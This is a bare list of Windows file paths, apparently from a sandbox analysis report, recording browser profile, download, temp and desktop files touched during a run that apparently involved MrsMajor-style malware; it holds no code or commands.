C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5973af.TMP
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\Downloads\Unconfirmed 887496.crdownload
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lxdz2ppb.iwy.ps1
memory/3312-1092-0x000002FB4F590000-0x000002FB4F5B2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\Downloads\Unconfirmed 637841.crdownload
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\8841c834-e24c-463f-99b0-754bed81eab4.tmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\Downloads\Unconfirmed 557387.crdownload
C:\Users\Admin\Downloads\Unconfirmed 557387.crdownload:SmartScreen
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Temp\5a530dfd-bc51-4992-a05d-f09d41a331d4\AgileDotNetRT64.dll
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\Downloads\Unconfirmed 872608.crdownload
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\Desktop\MRS MAJOR WANTS TO MEET YOU 5.txt
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak